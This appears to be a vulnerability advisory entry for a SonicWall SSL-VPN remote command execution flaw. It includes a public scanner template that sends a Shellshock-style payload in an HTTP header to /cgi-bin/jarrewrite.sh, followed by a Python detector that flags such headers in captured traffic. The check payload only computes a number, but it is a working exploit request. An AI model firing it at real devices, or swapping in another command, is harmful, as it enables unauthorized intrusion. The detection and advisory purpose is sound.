sonicwall-ssl-vpn-rce: SonicWall SSL-VPN Remote Command Execution Vulnerability

Date: 2025-09-01 | Affected software: SonicWall SSL-VPN | POC: Public

Vulnerability Description

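An exploit (EXP) for SonicWall SSL-VPN remote command execution was made public on January 24. The device has a remote command execution vulnerability. app="SONICWALL-SSL-VPN"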

PoC code [public]

id: sonicwall-ssl-vpn-rce

info:
    name: SonicWall SSL-VPN 远程命令执行漏洞
    author: sharecast
    severity: high
    description: |
        SonicWall SSL-VPN 远程命令执行在1月24日被公开 EXP,此设备存在远程命令执行漏洞
        app="SONICWALL-SSL-VPN"
    reference:
        - http://wiki.peiqi.tech/wiki/iot/SonicWall/SonicWall%20SSL-VPN%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html

set:
    r1: randomInt(40000, 44800)
    r2: randomInt(1140000, 1144800)
rules:
    r0:
        request:
            method: GET
            path: /cgi-bin/jarrewrite.sh
            headers:
                X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}'
        expression: response.status == 200 && response.body.bcontains(bytes(string(r1 - r2)))
expression: r0()
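
A detection-side companion to the template above, added here as an example and not part of the original PoC or any SonicWall tooling: it parses captured raw HTTP requests and flags any header whose value begins with the Bash function-definition prefix `() {`, whatever the header is called, since the template uses an arbitrary name (X-Test). The function names, the sample capture and the host vpn.example.test are assumptions made for illustration.

```python
import re

# Bash function-definition prefix "() {" at the start of a header value,
# the shape carried by the X-Test header in the template above.
FUNC_DEF = re.compile(r"^\s*\(\s*\)\s*\{")
TARGET_PATH = "/cgi-bin/jarrewrite.sh"  # path taken from the template above

def parse_request(raw):
    """Split a raw HTTP/1.x request head into (method, path, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) < 2:
        return None  # not a parseable request line
    method, target = parts[0], parts[1]
    path = target.split("?", 1)[0]
    headers = []
    for line in lines[1:]:
        # Split on the first colon only: the payload itself contains colons.
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return method, path, headers

def find_suspicious(raw_requests):
    """Return one finding per header whose value starts like a function definition."""
    findings = []
    for idx, raw in enumerate(raw_requests):
        parsed = parse_request(raw)
        if parsed is None:
            continue
        _method, path, headers = parsed
        for name, value in headers:
            if FUNC_DEF.match(value):
                findings.append({"request": idx, "path": path, "header": name,
                                 "known_path": path == TARGET_PATH})
    return findings

# Constructed sample capture (not real traffic); host name is a placeholder.
SAMPLE = [
    "GET /index.html HTTP/1.1\r\nHost: vpn.example.test\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET /cgi-bin/jarrewrite.sh HTTP/1.1\r\nHost: vpn.example.test\r\n"
    "X-Test: () { :; }; echo ; /bin/bash -c 'expr 1 - 2'\r\n\r\n",
    "GET /status HTTP/1.1\r\nHost: vpn.example.test\r\nX-Note: see f() { } in docs\r\n\r\n",
]

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE):
        print(finding)
```

Standard access logs do not record arbitrary request headers, so this check needs full request capture at a reverse proxy, WAF or packet level.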
